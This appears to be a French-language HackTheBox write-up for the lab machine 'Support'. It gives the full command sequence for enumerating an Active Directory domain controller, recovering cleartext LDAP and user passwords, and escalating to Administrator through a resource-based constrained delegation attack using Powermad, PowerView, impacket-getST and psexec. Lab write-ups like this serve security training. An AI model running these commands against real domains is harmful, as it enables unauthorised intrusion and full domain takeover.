Support HackTheBox (Writeup)

Skills:

SMB Enumeration
EXE Binary Analysis
Debugging with DNSpy
Setting breakpoints and getting an LDAP password in clear text (DNSpy)
Kerberos User Enumeration (kerbrute)
Ldap Enumeration (ldapsearch)
Information Leakage
Abusing Remote Management Users group (Evil-WinRM)
SharpHound + BloodHound Enumeration
Abusing Shared Support Accounts (GenericAll) (rbcd Attack) [Resource Based Constrained Delegation]
Resource Based Constrained Delegation Attack - Creating a Computer Object (powermad.ps1)
Resource Based Constrained Delegation Attack - PowerView.ps1
Resource Based Constrained Delegation Attack - Getting the impersonated service ticket (getST.py)
Using the ticket to gain Administrator access [Privilege Escalation]

Reconnaissance:

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.174 -oG allPorts

Scan de la version des ports avec Nmap : Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49679,49757,53952 10.10.11.174 -oN targeted

Énumération DC:

Énumération smb:

Utilisation de CrackMapExec pour l'énumération SMB.

crackmapexec smb 10.10.11.174

Pour résoudre les noms de domaine en adresses IP via DNS, on insère dans le fichier /etc/hosts le nom de domaine associé à son adresse IP

Énumération Kerberos :

Utilisation de Kerbrute pour l'enumeration des utilisateurs.

kerbrute userenum -d support.htb --dc 10.10.11.174 /usr/share/SecLists/Usernames/xato-net-10-million-usernames.txt

Exploration des partages réseau :

Recherche de dossiers partagés dans le réseau.

smbmap -H 10.10.11.174 -u none

smbclient //10.10.11.174/support-tools -N

Nous découvrons un fichier zip intéressant intitulé "UserInfo-exe-zip". Pour procéder, nous utilisons la commande get pour le télécharger sur notre machine.

Analyse de fichier binaire Windows :

Nous allons lancer un exécutable Windows sur une machine équipée de Windows.

pour cela il faudra:

Transférer l'archive ZIP

Migration de la configuration VPN
Configuration /etc/hosts

Pour exécuter le binaire et identifier tous les utilisateurs valides, il suffit de saisir la commande suivante

.\UserInfo.exe find -first * -last *

Ce binaire va nous permettre d'énumérer les utilisateurs.

Analyse du fichier binaire Windows téléchargé avec DNspy.

GitHub - dnSpy/dnSpy: .NET debugger and assembly editorGitHub

Extraction d'un mot de passe en clair :

Utilisation de DNspy pour extraire un mot de passe en clair à partir d'un binaire Windows.

Nous allons exécuter le programme, mais nous ferons une pause uniquement dans la section où le texte est clair.

Voici le mot de passe LDAP:

Vérification du mot de passe LDAP :

Vérification du mot de passe extrait avec CrackMapExec.

crackmapexec smb 10.10.11.174 -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'

Énumération du domaine:

rpcclient -U 'ldap%nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' 10.10.11.174

Utilisateurs du domaine:

enumdomusers

Groupes du domaine:

enumdomgroups

Description des users:

querydispinfo

Insertion de tous les utilisateurs valides du domaine dans un fichier.

rpcclient -U 'ldap%nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' 10.10.11.174 -c 'enumdomusers' | grep -oP '\[.*?\]' | grep -v 0x |tr -d '[]'

Nous allons maintenant vérifier si le mot de passe LDAP est réutilisé pour l'un des utilisateurs suivants :

crackmapexec smb 10.10.11.174 -u users -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --continue-on-success

Cependant, cela ne fonctionne pas.

Énumération LDAP :

389, 636, 3268, 3269 - Pentesting LDAP - HackTricksbook.hacktricks.xyz

Utilisation de la recherche LDAP pour l'énumération d'informations.

ldapsearch -x -H ldap://10.10.11.174 -D 'support.htb\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"

De nombreuses données sont disponibles, cependant, en appliquant un filtre sur l'information concernant le chant, on découvre un mot de passe destiné à l'utilisateur support.

ldapsearch -x -H ldap://10.10.11.174 -D '[email protected]' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb" | grep -i "info:" -B 20

Exploitation:

Utiliser CrackMapExec pour confirmer la validité du mot de passe associé au compte support.

crackmapexec smb 10.10.11.174 -u 'support' -p 'Ironside47pleasure40Watchful'

Cet utilisateur fait partie du groupe d'utilisateurs de gestion à distance, ce qui nous permet de nous connecter via Windows Remote Management (WinRM).

evil-winrm -i 10.10.11.174 -u 'support' -p 'Ironside47pleasure40Watchful'

Utilisation de l'outil Evil-WinRM :

Connexion au système cible via Evil-WinRM en utilisant les informations d'identification obtenues.

Élévation de privilége:

Examen des privilèges actuels :

Utilisation de la commande whoami /priv pour vérifier les privilèges de l'utilisateur, sans succès.

Analyse des groupes d'appartenance :

Utilisation de la commande net user support pour inspecter les groupes auxquels l'utilisateur appartient.

Découverte d'un groupe apparemment rare, "shared support accounts".

Utilisation de BloodHound pour l'analyse de privilèges :

Utilisation de l'outil BloodHound pour cartographier les relations d'accès.

GitHub - SpecterOps/SharpHound: C# Data Collector for BloodHoundGitHub

Exécution de SharpHound pour l'analyse complémentaire :

Utilisation de SharpHound, outil complémentaire à BloodHound, pour collecter des données supplémentaires sur les relations d'accès.

.\SharpHound.exe -c All

Vulnérabilité Resource Based Constrained Delegation Attack:

Resource-based Constrained Delegation - HackTricksbook.hacktricks.xyz

Identification de la vulnérabilité Resource Based Constrained Delegation Attack :

Déploiement du script Powermad pour la création d'un compte machine.

Powermad/Powermad.ps1 at master · Kevin-Robertson/PowermadGitHub

upload Powemad.ps1
Import-Module .\Powermad.ps1
New-MachineAccount -MachineAccount SERVICEA -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

Utilisation de PowerView pour vérifier la création du compte machine.

PowerSploit/Recon/PowerView.ps1 at master · PowerShellMafia/PowerSploitGitHub

upload PowerView.ps1
Import-Module .\PowerView.ps1

Définition des autorisations pour le compte machine à l'aide de commandes PowerShell.

$ComputerSid = Get-DomainComputer SERVICEA -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$ComputerSid)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

Avec cette commande, on vérifie si toute la procédure 'Get-DomainComputer dc' fonctionne en utilisant les propriétés 'msds-allowedtoactonbehalfofotheridentity'.'

Exploitation de la vulnérabilité

Utilisation de l'outil Impacket pour exécuter la commande `getST` afin d'obtenir un ticket TGT impersonnant l'utilisateur Administrator.

impacket-getST -spn cifs/dc.support.htb -impersonate Administrator -dc-ip 10.10.11.174 support.htb/SERVICEA$:123456

Configuration de l'environnement pour l'utilisateur Administrateur en exportant la variable `KRB5CCNAME et connexion`au système cible à l'aide de l'outil `psexec` d'Impacket.

export KRB5CCNAME=Administrator.ccache
impacket-psexec -k dc.support.htb

Flag finale :)

Mis à jour il y a 1 an

hashtagReconnaissance:

hashtagVérification de la Connectivité VPN

hashtagÉnumération DC:

hashtagÉnumération smb:

hashtagÉnumération Kerberos :

hashtagExploration des partages réseau :

hashtagAnalyse de fichier binaire Windows :

hashtagCe binaire va nous permettre d'énumérer les utilisateurs.

hashtagAnalyse du fichier binaire Windows téléchargé avec DNspy.

hashtagExtraction d'un mot de passe en clair :

hashtagVérification du mot de passe LDAP :

hashtagÉnumération du domaine:

hashtagUtilisateurs du domaine:

hashtagGroupes du domaine:

hashtagDescription des users:

hashtagInsertion de tous les utilisateurs valides du domaine dans un fichier.

hashtagNous allons maintenant vérifier si le mot de passe LDAP est réutilisé pour l'un des utilisateurs suivants :

hashtagÉnumération LDAP :

hashtagUtilisation de la recherche LDAP pour l'énumération d'informations.

hashtagDe nombreuses données sont disponibles, cependant, en appliquant un filtre sur l'information concernant le chant, on découvre un mot de passe destiné à l'utilisateur support.

hashtagExploitation:

hashtagUtiliser CrackMapExec pour confirmer la validité du mot de passe associé au compte support.

hashtagUtilisation de l'outil Evil-WinRM :

hashtagÉlévation de privilége:

hashtagExamen des privilèges actuels :

hashtagAnalyse des groupes d'appartenance :

hashtagUtilisation de BloodHound pour l'analyse de privilèges :

hashtagUtilisation de l'outil BloodHound pour cartographier les relations d'accès.

hashtagExécution de SharpHound pour l'analyse complémentaire :

hashtagVulnérabilité Resource Based Constrained Delegation Attack:

hashtagIdentification de la vulnérabilité Resource Based Constrained Delegation Attack :

hashtagDéploiement du script Powermad pour la création d'un compte machine.

hashtagUtilisation de PowerView pour vérifier la création du compte machine.

hashtagDéfinition des autorisations pour le compte machine à l'aide de commandes PowerShell.

hashtagAvec cette commande, on vérifie si toute la procédure 'Get-DomainComputer dc' fonctionne en utilisant les propriétés 'msds-allowedtoactonbehalfofotheridentity'.'

hashtagExploitation de la vulnérabilité

hashtagUtilisation de l'outil Impacket pour exécuter la commande getST afin d'obtenir un ticket TGT impersonnant l'utilisateur Administrator.

hashtagConfiguration de l'environnement pour l'utilisateur Administrateur en exportant la variable KRB5CCNAME et connexionau système cible à l'aide de l'outil psexec d'Impacket.

hashtagFlag finale :)